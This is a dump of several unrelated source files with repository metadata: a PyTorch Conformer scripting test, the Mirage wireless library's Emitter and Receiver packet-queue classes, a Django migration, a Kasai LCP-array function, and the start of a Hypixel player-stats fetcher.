.eval()
)
return conformer
def _gen_inputs(self, input_dim, batch_size, num_frames):
lengths = torch.randint(1, num_frames, (batch_size,)).to(device=self.device, dtype=self.dtype)
input = torch.rand(batch_size, int(lengths.max()), input_dim).to(device=self.device, dtype=self.dtype)
return input, lengths
def setUp(self):
super().setUp()
torch.random.manual_seed(31)
def test_torchscript_consistency_forward(self):
r"""Verify that scripting Conformer does not change the behavior of method `forward`."""
input_dim = 80
batch_size = 10
num_frames = 400
conformer = self._gen_model()
input, lengths = self._gen_inputs(input_dim, batch_size, num_frames)
scripted = torch_script(conformer)
ref_out, ref_len = conformer(input, lengths)
scripted_out, scripted_len = scripted(input, lengths)
self.assertEqual(ref_out, scripted_out)
self.assertEqual(ref_len, scripted_len)
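The scripted-vs-eager comparison above follows a generic TorchScript consistency pattern; a minimal standalone sketch of that pattern (using a hypothetical toy module rather than Conformer, and plain torch.jit.script rather than the torch_script test helper) looks like this.
import torch


class Toy(torch.nn.Module):
    # Hypothetical module, used only to illustrate the consistency check.
    def forward(self, x: torch.Tensor) -> torch.Tensor:
        return torch.relu(x) + 1.0


eager = Toy().eval()
scripted = torch.jit.script(eager)  # compile to TorchScript
x = torch.randn(3, 5)
# Scripting must not change the numerical behaviour of forward().
torch.testing.assert_close(eager(x), scripted(x))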
| 34.52 | 110 | 0.625724 |
813fa2010aabffb37d93f6ebd97ecc00d0c312b3 | 12,299 | py | Python | mirage/libs/wireless.py | Cabalist/mirage | 22553d22da4e87ffb99da8d19f8b552986df0965 | ["MIT"] | null | null | null | mirage/libs/wireless.py | Cabalist/mirage | 22553d22da4e87ffb99da8d19f8b552986df0965 | ["MIT"] | null | null | null | mirage/libs/wireless.py | Cabalist/mirage | 22553d22da4e87ffb99da8d19f8b552986df0965 | ["MIT"] | null | null | null |
import time
from queue import Empty, Queue
from scapy.packet import Packet
import mirage.libs.io as io
from mirage.libs.wireless_utils.callbacks import Callback
from mirage.libs.wireless_utils.device import Device
from mirage.libs.wireless_utils.packetQueue import PacketQueue
from mirage.libs.wireless_utils.packets import WaitPacket
class Emitter(PacketQueue):
'''
    This class allows a user to communicate with a device in order to send data. Indeed, Mirage provides no direct access to the device component from the modules: the hardware components are manipulated through the Emitter class and the Receiver class. Emitter classes for a given technology inherit from this class.
    Packets are manipulated as an abstract representation in Emitters and Receivers (``mirage.libs.wireless_utils.packets.Packet``) and as a raw representation in Devices (e.g. bytes array or scapy frame). That's why an Emitter must implement the following method:
    * convert(self,packet) : this method converts a Mirage Packet into its raw representation
    The constructor of an Emitter needs three parameters:
    * `interface` : indicating the interface to use to instantiate the device, generally it will be provided by the user
    * `packetType` : indicating the child class of Packet for the technology implemented by the Emitter
    * `deviceType` : indicating the child class of Device to instantiate
    A `_task` method is implemented by default. It gets a Mirage Packet from the queue, calls the convert method on it and calls the send method of the Device on the result. If you want to customize this behaviour, you can override this method.
'''
def __init__(self,interface,packetType=Packet, deviceType=Device):
self.interface = interface
self.packetType = packetType
self.deviceType = deviceType
self.device = self.deviceType.get(self.interface)
self.transmitting = False
super().__init__(waitEmpty=False)
def isTransmitting(self):
'''
        This method indicates whether the Emitter is currently transmitting.
        :return: boolean indicating whether the Emitter is currently transmitting
:rtype: bool
:Example:
>>> emitter.isTransmitting()
True
'''
return self.transmitting
def _send(self,data):
if isinstance(data,bytes) and data[:5] == b"WAIT:":
time.sleep(float(data[5:]))
else:
self.device.send(data)
def convert(self,packet):
'''
        This method converts a Mirage Packet into a raw packet (e.g. bytes array or scapy frame). It must be overridden by child classes.
:param packet: Mirage Packet to convert
:type packet: mirage.libs.wireless_utils.packets.Packet
:return: raw representation of a packet
'''
if isinstance(packet,Packet):
return packet.packet
else:
io.fail("Malformed packet")
return None
def convertMiragePacketToRaw(self,data):
'''
        This method is an alias for the convert method of an emitter.
        :param data: Mirage packet to convert
        :type data: mirage.libs.wireless_utils.packets.Packet
        :return: raw representation of the packet
'''
return self.convert(data)
def _task(self):
if not self.isEmpty():
self.transmitting = True
packet = self.queue.get()
if isinstance(packet,WaitPacket):
data = bytes("WAIT:"+str(packet.time),"ascii")
else:
data = self.convert(packet)
if data is not None:
self._send(data)
self.transmitting = not self.isEmpty()
else:
time.sleep(0.005)
def send(self,*packets):
'''
        This method sends one or more Mirage Packets.
:param `*packets`: packets to send
:type `*packets`: mirage.libs.wireless_utils.packets.Packet (multiple)
:Example:
>>> emitter.send(packet1, packet2, packet3)
>>> emitter.send(packet1)
'''
for packet in packets:
self.queue.put(packet)
def sendp(self,*packets):
'''
This method is an alias for `send`.
:param `*packets`: packets to send
:type `*packets`: mirage.libs.wireless_utils.packets.Packet (multiple)
:Example:
>>> emitter.sendp(packet1, packet2, packet3)
>>> emitter.sendp(packet1)
'''
self.send(*packets)
def stop(self):
'''
Stops the Emitter and the associated device
'''
super().stop()
if self.isDeviceUp():
self.device.close()
class Receiver(PacketQueue):
'''
    This class allows a user to communicate with a device in order to receive data. Indeed, Mirage provides no direct access to the device component from the modules: the hardware components are manipulated through the Emitter class and the Receiver class. Receiver classes for a given technology inherit from this class.
    Packets are manipulated as an abstract representation in Emitters and Receivers (``mirage.libs.wireless_utils.packets.Packet``) and as a raw representation in Devices (e.g. bytes array or scapy frame). That's why a Receiver must implement the following method:
    * convert(self,packet) : this method converts a raw representation of a packet into a Mirage Packet
    The constructor of a Receiver needs three parameters:
    * `interface` : indicating the interface to use to instantiate the device, generally it will be provided by the user
    * `packetType` : indicating the child class of Packet for the technology implemented by the Receiver
    * `deviceType` : indicating the child class of Device to instantiate
    A `_task` method is implemented by default. It calls the recv method of a Device, converts the result (if it is not None) to a Mirage Packet and adds it to the queue. If you want to customize this behaviour, you can override this method.
'''
def __init__(self,interface,packetType=Packet, deviceType=Device):
self.interface = interface
self.packetType = packetType
self.deviceType = deviceType
self.device = self.deviceType.get(self.interface)
self.callbacks = []
self.receiving = False
self.callbacksQueue = Queue()
self.callbacksActiveListening = False
super().__init__(waitEmpty=False, autoStart=True)
def convert(self,data):
'''
        This method converts a raw Packet (e.g. bytes array or scapy frame) into a Mirage Packet. It must be overridden by child classes.
:param data: raw representation of a packet
:return: Mirage packet
:rtype: mirage.libs.wireless_utils.packets.Packet
'''
return Packet(packet=data)
def convertRawToMiragePacket(self,data):
'''
This method is an alias for the convert method of a receiver.
:param data: raw representation of a packet
:return: Mirage packet
:rtype: mirage.libs.wireless_utils.packets.Packet
'''
return self.convert(data)
def _add(self,data):
if data is not None:
packet = self.convert(data)
self._executeCallbacks(packet)
if packet is not None:
self.queue.put(packet)
def isReceiving(self):
'''
        This method indicates whether the Receiver is currently receiving.
        :return: boolean indicating whether the Receiver is currently receiving
:rtype: bool
:Example:
>>> receiver.isReceiving()
True
'''
return self.receiving
def _task(self):
self.receiving = True
pkt = self.device.recv()
self._add(pkt)
self.receiving = False
def clean(self):
'''
        This method removes every Mirage Packet stored in the queue.
:Example:
>>> receiver.clean()
'''
while not self.isEmpty():
self.skip()
def skip(self,timeout=None):
'''
This method skips the next Mirage Packet stored in the queue.
:param timeout: time (in seconds) before the method fails
:type timeout: float
:Example:
>>> receiver.skip(timeout=1.0)
'''
next(self.receive(timeout=timeout))
def next(self,timeout=None):
'''
This method returns the next Mirage Packet stored in the queue.
:param timeout: time (in seconds) before the method fails
:type timeout: float
:Example:
>>> packet = receiver.next(timeout=1.0)
'''
return next(self.receive(timeout=timeout))
def receive(self,nb=1,loop=False,timeout=None):
'''
        This method provides a generator allowing iteration over the incoming Mirage Packets.
:param nb: number of packets to receive in the iterator
:type nb: int
:param loop: boolean indicating if the packets must be continuously received
:type loop: bool
:param timeout: time (in seconds) before a reception fails
:type timeout: float
:return: generator of Mirage Packets (``mirage.libs.wireless_utils.packets.Packet``)
:Example:
>>> for packet in receiver.receive(nb=5):
... packet.show()
<< Packet >>
<< Packet >>
<< Packet >>
<< Packet >>
<< Packet >>
>>> for packet in receiver.receive(loop=True, timeout=1.0):
... if packet is not None:
... packet.show()
... else:
... io.info("Timeout !")
[INFO] Timeout !
<< Packet >>
[INFO] Timeout !
[INFO] Timeout !
<< Packet >>
[...]
'''
def get():
try:
return self.queue.get(timeout=timeout)
except Empty:
return None
if loop:
while True:
yield get()
else:
for _ in range(nb):
yield get()
def onEvent(self,event="*", callback=None, args=[], kwargs={}, background=True):
'''
        This method attaches a callback, triggered when specific Mirage Packets are received.
        It is linked to an *event*, which is a string indicating when the callback should be called.
        Three formats exist for describing an event :
        * *\** : indicating "the callback is called every time a packet is received"
        * *n* : indicating "the callback is called every time n packets have been received"
        * *packetType* : indicating "the callback is called every time a packet of type 'packetType' is received"
Some examples are represented in the following table:
+----------------------+-------------------------------+
| Event | Description |
+======================+===============================+
| \* | every packet |
+----------------------+-------------------------------+
| 3 | every 3 packets |
+----------------------+-------------------------------+
| BLEReadRequest | every BLE Read Request |
+----------------------+-------------------------------+
The function *callback* is called with the following format : callback(packet,*args,**kwargs)
A callback can be run in the associated background thread (by default) or in foreground by using the methods ``listenCallbacks`` and ``stopListeningCallbacks``.
:param event: string describing the associated event
:type event: str
:param callback: function to call when the associated event is triggered
:type callback: function
:param args: unnamed arguments to provide to the function
:type args: list
:param kwargs: named arguments to provide to the function
:type kwargs: dict
:param background: boolean indicating if the callback is run in background or in foreground
:type background: bool
:Example:
>>> def show(packet):
... packet.show()
>>> receiver.onEvent("*", callback=show)
>>> def onReadRequest(packet,username):
... io.info("Hello "+username+", I have an incoming Read Request for you : "+str(packet))
>>> receiver.onEvent("BLEReadRequest",callback=onReadRequest, args=["Romain"])
'''
self.callbacks.append(Callback(event=event, function=callback, args=args, kwargs=kwargs, background=background))
def _executeCallbacks(self,packet):
for callback in self.callbacks:
callback.update(packet)
if callback.runnable:
if callback.background:
callback.run(packet)
else:
self.callbacksQueue.put((self.callbacks.index(callback),packet))
def stopListeningCallbacks(self):
'''
Stops the foreground callbacks execution loop.
:Example:
>>> receiver.stopListeningCallbacks()
'''
self.callbacksActiveListening = False
def listenCallbacks(self):
'''
Starts the foreground callbacks execution loop.
:Example:
>>> receiver.listenCallbacks()
'''
self.callbacksActiveListening = True
while self.callbacksActiveListening:
if not self.callbacksQueue.empty():
index,packet = self.callbacksQueue.get()
self.callbacks[index].run(packet)
def removeCallbacks(self):
'''
Remove the callbacks attached to the Receiver.
'''
self.callbacks = []
def stop(self):
'''
Stops the Receiver and the associated device
'''
super().stop()
if self.isDeviceUp():
self.device.close()
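To make the Emitter/Receiver contract described in the docstrings above concrete, here is a standalone toy sketch (none of these classes exist in mirage; they only mirror the documented behaviour): an emitter converts abstract packets to raw bytes, a receiver converts raw bytes back and dispatches callbacks for the three documented event formats.
class ToyPacket:
    # Stand-in for mirage.libs.wireless_utils.packets.Packet (hypothetical).
    def __init__(self, payload: bytes):
        self.payload = payload


class ToyEmitter:
    def convert(self, packet: ToyPacket) -> bytes:
        return packet.payload  # abstract -> raw, as Emitter subclasses must do


class ToyReceiver:
    def __init__(self):
        self.callbacks = []  # list of (event, function) pairs
        self.count = 0

    def convert(self, data: bytes) -> ToyPacket:
        return ToyPacket(data)  # raw -> abstract, as Receiver subclasses must do

    def onEvent(self, event, callback):
        self.callbacks.append((event, callback))

    def dispatch(self, packet: ToyPacket):
        self.count += 1
        for event, callback in self.callbacks:
            # "*" fires always, an int fires every n packets, a name fires per type.
            if (event == "*"
                    or (isinstance(event, int) and self.count % event == 0)
                    or event == type(packet).__name__):
                callback(packet)


receiver = ToyReceiver()
receiver.onEvent("*", lambda p: print("got", p.payload))
receiver.dispatch(receiver.convert(b"\x01\x02"))  # prints: got b'\x01\x02'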
| 31.136709 | 325 | 0.694121 |
5ab302b636983e731ff53435c5bc2eb8e0e8f5fc | 348 | py | Python | CourseMatter/content/migrations/0004_alter_course_options.py | ss4328/CourseMatter | 6eb7d13c178644bb300c3d7a7366e7aa290cce47 | ["MIT"] | null | null | null | CourseMatter/content/migrations/0004_alter_course_options.py | ss4328/CourseMatter | 6eb7d13c178644bb300c3d7a7366e7aa290cce47 | ["MIT"] | null | null | null | CourseMatter/content/migrations/0004_alter_course_options.py | ss4328/CourseMatter | 6eb7d13c178644bb300c3d7a7366e7aa290cce47 | ["MIT"] | null | null | null |
# Generated by Django 3.2.3 on 2021-05-20 22:12
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('content', '0003_content_course'),
]
operations = [
migrations.AlterModelOptions(
name='course',
options={'ordering': ['-created_on']},
),
]
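For context, an AlterModelOptions operation like the one above is what makemigrations emits after a default ordering is added to the model's Meta; a hypothetical sketch of the corresponding model state (field names other than created_on are illustrative, not taken from CourseMatter) would be:
# Hypothetical sketch of the model this migration reflects: newest entries first.
from django.db import models


class Course(models.Model):
    title = models.CharField(max_length=200)              # illustrative field
    created_on = models.DateTimeField(auto_now_add=True)  # ordering key

    class Meta:
        ordering = ['-created_on']  # matches the AlterModelOptions above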
| 19.333333 | 50 | 0.58908 |
68f66638b5cae9c1a1ca0bce4752cf7ae5d676f2 | 510 | py | Python | src/kgmk/dsa/string/lcp_array/kasai/__init__.py | kagemeka/python | 486ce39d97360b61029527bacf00a87fdbcf552c | ["MIT"] | null | null | null | src/kgmk/dsa/string/lcp_array/kasai/__init__.py | kagemeka/python | 486ce39d97360b61029527bacf00a87fdbcf552c | ["MIT"] | null | null | null | src/kgmk/dsa/string/lcp_array/kasai/__init__.py | kagemeka/python | 486ce39d97360b61029527bacf00a87fdbcf552c | ["MIT"] | null | null | null |
import typing
class LCPKasai():
def __call__(
self,
a: typing.List[int],
sa: typing.List[int],
) -> typing.List[int]:
n = len(a)
assert n > 0 and len(sa) == n
rank = [-1] * n
for i, x in enumerate(sa): rank[x] = i
h, l = [0] * (n - 1), 0
for i in range(n):
if l > 0: l -= 1
r = rank[i]
if r == n - 1: continue
j = sa[r + 1]
while i + l < n and j + l < n:
if a[i + l] != a[j + l]: break
l += 1
h[r] = l
return h
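A small usage sketch for the class above (the suffix array is built naively here for clarity; Kasai's pass itself runs in O(n)):
# "banana": suffix array by naive sorting, then LCP array via the class above.
text = "banana"
a = [ord(c) for c in text]
sa = sorted(range(len(text)), key=lambda i: text[i:])  # [5, 3, 1, 0, 4, 2]
h = LCPKasai()(a, sa)
# Sorted suffixes: "a", "ana", "anana", "banana", "na", "nana"
# h[r] = LCP of the r-th and (r+1)-th sorted suffixes
assert h == [1, 3, 0, 0, 2]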
| 20.4 | 42 | 0.433333 |
13642a4f2c28f57af31267886833f1693ef73940 | 83,968 | py | Python | core/minecraft/hypixel/player.py | vcokltfre/Myaer | 8e2a57f26635781e19716b47028f465617defa75 | ["MIT"] | null | null | null | core/minecraft/hypixel/player.py | vcokltfre/Myaer | 8e2a57f26635781e19716b47028f465617defa75 | ["MIT"] | null | null | null | core/minecraft/hypixel/player.py | vcokltfre/Myaer | 8e2a57f26635781e19716b47028f465617defa75 | ["MIT"] | null | null | null |
"""
MIT License
Copyright (c) 2020 MyerFire
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import time
import ratelimit
import core.caches.players
import core.minecraft.hypixel.friends
import core.minecraft.hypixel.guild
import core.minecraft.hypixel.request
import core.minecraft.hypixel.static.static
import core.minecraft.hypixel.status
async def get_player_data(uuid, *, use_cache: bool = True, get_guild: bool = False, get_friends: bool = False,
get_status: bool = False):
if not use_cache:
valid = False
else:
player_cache = await core.caches.players.find_player_data(uuid)
if player_cache: # returns cached data only if it contains all the requested information
valid = True if ((not get_guild) and (not get_friends) or (
get_friends and player_cache["data"]["friends"]) or (
get_guild and player_cache["data"]["guild_data"])) and (time.time()) - \
player_cache["time"] < 14400 else False # cached for 5 minutes
else:
valid = False
if valid:
return player_cache["data"]
else:
try:
player_json = await core.minecraft.hypixel.request.get_player_uuid(uuid)
except NameError:
raise NameError("No Hypixel stats")
except ratelimit.RateLimitException:
raise OverflowError # idk how to make custom exceptions so this is close enough
if get_guild: # only get guild if necessary, because it's another request
try:
player_guild_json = await core.minecraft.hypixel.guild.get_guild_data(uuid)
except NameError:
player_guild_json = None
except ratelimit.RateLimitException:
raise ratelimit.RateLimitException
else:
player_guild_json = None
if get_friends: # only get friends if necessary, because it's another request
try:
player_friends_json = await core.minecraft.hypixel.friends.get_friends(uuid)
except NameError:
player_friends_json = None
except ratelimit.RateLimitException:
raise ratelimit.RateLimitException
else:
player_friends_json = None
if get_status: # only get status if necessary, because it's another request
try:
player_status_json = await core.minecraft.hypixel.status.get_status(uuid)
except NameError:
player_status_json = None
except ratelimit.RateLimitException:
raise ratelimit.RateLimitException
else:
player_status_json = None
player = { # This thing is pretty torture
"name": player_json.get("player", {}).get("displayname", ""),
"level_data": (await core.minecraft.hypixel.static.static.get_network_level_data(
player_json.get("player", {}).get("networkExp", 0))),
"karma": player_json.get("player", {}).get("karma", 0),
"achievement_points": player_json.get("player", {}).get("achievementPoints", 0),
"rank_data": (
await core.minecraft.hypixel.static.static.get_rank_data((player_json.get("player", {}).get("rank", None)),
(player_json.get("player", {}).get("prefix",
None)), (
player_json.get("player", {}).get(
"monthlyPackageRank", None)), (
player_json.get("player", {}).get(
"newPackageRank", None)),
(player_json.get("packageRank", None)))),
"guild_data": player_guild_json,
"friends": player_friends_json,
"status": player_status_json,
"login_times": {
"first": player_json.get("player", {}).get("firstLogin", 0),
"last": player_json.get("player", {}).get("lastLogin", 0)
},
"social_media": {
"twitter": player_json.get("player", {}).get("socialMedia", {}).get("links", {}).get("TWITTER", None),
"youtube": player_json.get("player", {}).get("socialMedia", {}).get("links", {}).get("YOUTUBE", None),
"instagram": player_json.get("player", {}).get("socialMedia", {}).get("links", {}).get("INSTAGRAM", None),
"twitch": player_json.get("player", {}).get("socialMedia", {}).get("links", {}).get("TWITCH", None),
"discord": player_json.get("player", {}).get("socialMedia", {}).get("links", {}).get("DISCORD", None),
"hypixel_forums": player_json.get("player", {}).get("socialMedia", {}).get("links", {}).get("HYPIXEL",
None),
},
"bedwars": {
"star": player_json.get("player", {}).get("achievements", {}).get("bedwars_level", 0),
"coins": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get("coins_bedwars", 0),
"games_played": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"games_played_bedwars", 0),
"beds_broken": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get("beds_broken_bedwars",
0),
"beds_lost": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get("beds_lost_bedwars", 0),
"kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get("kills_bedwars", 0),
"deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get("deaths_bedwars", 0),
"final_kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get("final_kills_bedwars",
0),
"final_deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"final_deaths_bedwars", 0),
"wins": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get("wins_bedwars", 0),
"losses": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get("losses_bedwars", 0),
"winstreak": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get("winstreak", 0),
"solo": {
"games_played": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_games_played_bedwars", 0),
"beds_broken": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_beds_broken_bedwars", 0),
"beds_lost": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_beds_lost_bedwars", 0),
"kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_kills_bedwars", 0),
"deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_deaths_bedwars", 0),
"final_kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_final_kills_bedwars", 0),
"final_deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_final_deaths_bedwars", 0),
"wins": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get("eight_one_wins_bedwars",
0),
"losses": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_losses_bedwars", 0),
"winstreak": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_winstreak", 0),
},
"doubles": {
"games_played": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_games_played_bedwars", 0),
"beds_broken": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_beds_broken_bedwars", 0),
"beds_lost": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_beds_lost_bedwars", 0),
"kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_kills_bedwars", 0),
"deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_deaths_bedwars", 0),
"final_kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_final_kills_bedwars", 0),
"final_deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_final_deaths_bedwars", 0),
"wins": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get("eight_two_wins_bedwars",
0),
"losses": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_losses_bedwars", 0),
"winstreak": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_winstreak", 0),
},
"threes": {
"games_played": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_three_games_played_bedwars", 0),
"beds_broken": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_three_beds_broken_bedwars", 0),
"beds_lost": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_three_beds_lost_bedwars", 0),
"kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_three_kills_bedwars", 0),
"deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_three_deaths_bedwars", 0),
"final_kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_three_final_kills_bedwars", 0),
"final_deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_three_final_deaths_bedwars", 0),
"wins": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get("four_three_wins_bedwars",
0),
"losses": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_three_losses_bedwars", 0),
"winstreak": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_three_winstreak", 0),
},
"fours": {
"games_played": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_games_played_bedwars", 0),
"beds_broken": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_beds_broken_bedwars", 0),
"beds_lost": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_beds_lost_bedwars", 0),
"kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_kills_bedwars", 0),
"deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_deaths_bedwars", 0),
"final_kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_final_kills_bedwars", 0),
"final_deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_final_deaths_bedwars", 0),
"wins": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get("four_four_wins_bedwars",
0),
"losses": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_losses_bedwars", 0),
"winstreak": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_winstreak", 0),
},
"four_v_four": {
"games_played": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"two_four_games_played_bedwars", 0),
"beds_broken": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"two_four_beds_broken_bedwars", 0),
"beds_lost": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"two_four_beds_lost_bedwars", 0),
"kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get("two_four_kills_bedwars",
0),
"deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"two_four_deaths_bedwars", 0),
"final_kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"two_four_final_kills_bedwars", 0),
"final_deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"two_four_final_deaths_bedwars", 0),
"wins": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get("two_four_wins_bedwars",
0),
"losses": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"two_four_losses_bedwars", 0),
"winstreak": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get("two_four_winstreak",
0),
},
"dreams": {
"armed": {
"doubles": {
"games_played": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_armed_games_played_bedwars", 0),
"beds_broken": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_armed_beds_broken_bedwars", 0),
"beds_lost": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_armed_beds_lost_bedwars", 0),
"kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_armed_kills_bedwars", 0),
"void_kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_armed_void_kills_bedwars", 0),
"deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_armed_deaths_bedwars", 0),
"void_deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_armed_void_deaths", 0),
"final_kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_armed_final_kills_bedwars", 0),
"final_deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_armed_final_deaths_bedwars", 0),
"wins": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_armed_wins_bedwars", 0),
"losses": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_armed_losses_bedwars", 0),
"winstreak": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_armed_winstreak", 0),
"items_purchased": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_armed__items_purchased_bedwars", 0),
"resources_collected": {
"all": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_armed_resources_collected_bedwars", 0),
"iron": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_armed_iron_resources_collected_bedwars", 0),
"gold": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_armed_gold_resources_collected_bedwars", 0),
"emeralds": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_armed_emerald_resources_collected_bedwars", 0),
"diamonds": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_armed_diamond_resources_collected_bedwars", 0),
}
},
"fours": {
"games_played": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_armed_games_played_bedwars", 0),
"beds_broken": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_armed_beds_broken_bedwars", 0),
"beds_lost": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_armed_beds_lost_bedwars", 0),
"kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_armed_kills_bedwars", 0),
"void_kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_armed_void_kills_bedwars", 0),
"deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_armed_deaths_bedwars", 0),
"void_deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_armed_void_deaths", 0),
"final_kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_armed_final_kills_bedwars", 0),
"final_deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_armed_final_deaths_bedwars", 0),
"wins": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_armed_wins_bedwars", 0),
"losses": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_armed_losses_bedwars", 0),
"winstreak": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_armed_winstreak", 0),
"items_purchased": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_armed__items_purchased_bedwars", 0),
"resources_collected": {
"all": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_armed_resources_collected_bedwars", 0),
"iron": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_armed_iron_resources_collected_bedwars", 0),
